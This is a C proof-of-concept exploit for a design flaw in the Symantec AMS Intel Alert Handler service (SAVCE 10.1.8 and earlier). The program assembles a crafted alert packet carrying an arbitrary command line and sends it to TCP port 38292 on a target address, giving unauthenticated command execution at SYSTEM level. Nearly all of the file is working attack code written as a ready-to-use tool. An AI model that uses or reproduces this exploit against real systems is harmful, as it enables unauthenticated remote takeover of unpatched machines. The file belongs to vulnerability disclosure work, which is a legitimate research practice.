// Remote command execution at System level without authentication
// Advisory: https://www.foofus.net/?page_id=149
// Exploit Title: Symantec AMS Intel Alert Handler service Design Flaw
// Date: 07/28/10
// Author: Spider
// Software Link: http://www.foofus.net/~spider/code/ams-cmd.cpp.txt
// Tested on: Symantec SAVCE 10.1.8 and earlier with AMS installed
// POC code to execute commands on system vulnerable to AMS2
// design flaw of Intel Alert Handler service (hndlrsvc.exe)
// within Symantec SAVCE 10.1.8 and earlier
// ***Created by Spider July 2009***
//--------------------Foofus.net-------------------------

#include <stdio.h>
#include <stdlib.h>
#include <dos.h>
#include <string.h>
#include <winsock.h>
#include <windows.h>

// Buffer in which the crafted alert packet is assembled (at most 742 bytes are used)
unsigned char payload[1000];

// Fixed alert header and leading record fields (356 bytes). Bytes 353 and 355 are
// length fields for the first copy of the command and are patched at runtime.
unsigned char inject1[] =
"\xff\xff\xff\xff\xff\xff\xff\xff\x00\x00"
"\x02\x00\x95\x94\xc0\xa8\x02\x64\x00\x00\x00\x00\x00\x00\x00\x00"
"\xe8\x03\x00\x00\x50\x52\x47\x58\x43\x4e\x46\x47\x10\x00\x00\x00"
"\x00\x00\x00\x00\x04\x41\x4c\x48\x44\x5c\x46\x00\x00\x01\x00\x00"
"\x00\x01\x00\x0e\x00\x52\x69\x73\x6b\x20\x52\x65\x70\x61\x69\x72"
"\x65\x64\x00\x25\x00\x53\x79\x6d\x61\x6e\x74\x65\x63\x20\x41\x6e"
"\x74\x69\x56\x69\x72\x75\x73\x20\x43\x6f\x72\x70\x6f\x72\x61\x74"
"\x65\x20\x45\x64\x69\x74\x69\x6f\x6e\x00\xf9\x1d\x13\x4a\x3f\x0c"
"\x00\x4c\x41\x42\x53\x59\x53\x54\x45\x4d\x2d\x31\x00\x08\x08\x0a"
"\x00\x52\x69\x73\x6b\x20\x4e\x61\x6d\x65\x00\x07\x00\x05\x00\x54"
"\x65\x73\x74\x00\x08\x0a\x00\x46\x69\x6c\x65\x20\x50\x61\x74\x68"
"\x00\x07\x00\x05\x00\x54\x65\x73\x74\x00\x08\x11\x00\x52\x65\x71"
"\x75\x65\x73\x74\x65\x64\x20\x41\x63\x74\x69\x6f\x6e\x00\x07\x00"
"\x05\x00\x54\x65\x73\x74\x00\x08\x0e\x00\x41\x63\x74\x75\x61\x6c"
"\x20\x41\x63\x74\x69\x6f\x6e\x00\x07\x00\x05\x00\x54\x65\x73\x74"
"\x00\x08\x07\x00\x4c\x6f\x67\x67\x65\x72\x00\x07\x00\x05\x00\x54"
"\x65\x73\x74\x00\x08\x05\x00\x55\x73\x65\x72\x00\x07\x00\x05\x00"
"\x54\x65\x73\x74\x00\x08\x09\x00\x48\x6f\x73\x74\x6e\x61\x6d\x65"
"\x00\x0e\x00\x0c\x00\x4c\x41\x42\x53\x59\x53\x54\x45\x4d\x2d\x31"
"\x00\x08\x13\x00\x43\x6f\x72\x72\x65\x63\x74\x69\x76\x65\x20\x41"
"\x63\x74\x69\x6f\x6e\x73\x00\x07\x00\x05\x00\x54\x65\x73\x74\x00"
"\x00\x07\x08\x12\x00\x43\x6f\x6e\x66\x69\x67\x75\x72\x61\x74\x69"
"\x6f\x6e\x4e\x61\x6d\x65\x00\x22\x00\x20";

// "CommandLine" field name that precedes the second copy of the command (15 bytes)
unsigned char cmdother[] =
"\x00\x08\x0c\x00\x43\x6f\x6d\x6d\x61\x6e\x64\x4c\x69\x6e\x65";

// Trailing fields: RunArgs, Mode, FormatString, ConfigurationName, HandlerHost (109 bytes)
unsigned char inject2[] =
"\x00\x08\x08\x00\x52\x75\x6e\x41\x72\x67\x73\x00\x04\x00\x02\x00"
"\x20\x00\x03\x05\x00\x4d\x6f\x64\x65\x00\x04\x00\x02\x00\x00\x00"
"\x0a\x0d\x00\x46\x6f\x72\x6d\x61\x74\x53\x74\x72\x69\x6e\x67\x00"
"\x02\x00\x00\x00\x08\x12\x00\x43\x6f\x6e\x66\x69\x67\x75\x72\x61"
"\x74\x69\x6f\x6e\x4e\x61\x6d\x65\x00\x02\x00\x00\x00\x08\x0c\x00"
"\x48\x61\x6e\x64\x6c\x65\x72\x48\x6f\x73\x74\x00\x0b\x00\x09\x00"
"\x44\x45\x41\x44\x42\x45\x45\x46\x00\x00\x00\x00\x00";

void banner(char *proga)
{
    system("cls");
    printf("\nUse: %s <ip> <command>\n", proga);
}

int main(int argc, char *argv[])
{
    SOCKET sock;
    WSADATA wsa;
    struct sockaddr_in addr;

    printf("_______ ____\n");
    printf(" | /\\ |/_/___ |__| _\\ |____ __ | /\\ | \n");
    printf("\\_\\\\//_/ \\_\\ . \\||/ . / ._\\| `_/\\_\\\\//_/\n");
    printf(" .'/()\\'./___/_/|__|\\___\\___\\|_| .'/()\\'. \n");
    printf(" \\ \\/ /|_\\ \\ \\/ / \n");
    printf("AMS Remote Command Tool\n");

    if (argc < 3) {
        banner(argv[0]);
        exit(0);
    }

    char *ip_addr = argv[1];
    int length = (int)strlen(argv[2]);
    if (length > 128) {
        printf("\n WARNING WARNING WARNING \n");
        printf("\n Input Command String Greater than 128 Characters is not Permitted \n");
        exit(0);
    }

    // building injection packet
    // patch the two length fields of the first command copy, then copy the fixed header
    inject1[353] = length + 3;
    inject1[355] = length + 1;
    memcpy(payload, inject1, 356);

    // first copy of the command string (payload is zero-initialised, so the
    // separator bytes left untouched here are already 0x00)
    int a = 356;
    for (int i = 0; i < length; i++) {
        a = a + 1;
        payload[a] = argv[2][i];
    }

    // "CommandLine" field name
    int b = a;
    for (int i = 0; i <= 14; i++) {
        b = b + 1;
        payload[b] = cmdother[i];
    }

    // length fields and second copy of the command string
    int c = b;
    payload[c + 2] = length + 3;
    payload[c + 4] = length + 1;
    int d = c + 5;
    for (int i = 0; i < length; i++) {
        d = d + 1;
        payload[d] = argv[2][i];
    }

    // trailing fields (including the terminating NUL of inject2)
    int e = d;
    for (int i = 0; i <= 109; i++) {
        e = e + 1;
        payload[e] = inject2[i];
    }

    // setting up socket and sending packet
    printf("[] preparing....\n");
    WSAStartup(MAKEWORD(2, 0), &wsa);
    sock = socket(AF_INET, SOCK_STREAM, IPPROTO_IP);
    if (sock == INVALID_SOCKET) {
        printf("[-] socket creation failed!\n");
        WSACleanup();
        exit(0);
    }
    addr.sin_family = AF_INET;
    addr.sin_port = htons(38292);
    addr.sin_addr.s_addr = inet_addr(ip_addr);

    printf("[] connecting..\n");
    if (connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == SOCKET_ERROR) {
        printf("[-] connection failed!\n");
        exit(0);
    }

    printf("[] sending crafted packet 1 ...\n");
    if (send(sock, (const char *)payload, sizeof(payload), 0) == SOCKET_ERROR) {
        printf("[-] send failed!\n");
        exit(0);
    }

    closesocket(sock);
    WSACleanup();
    return 0;
}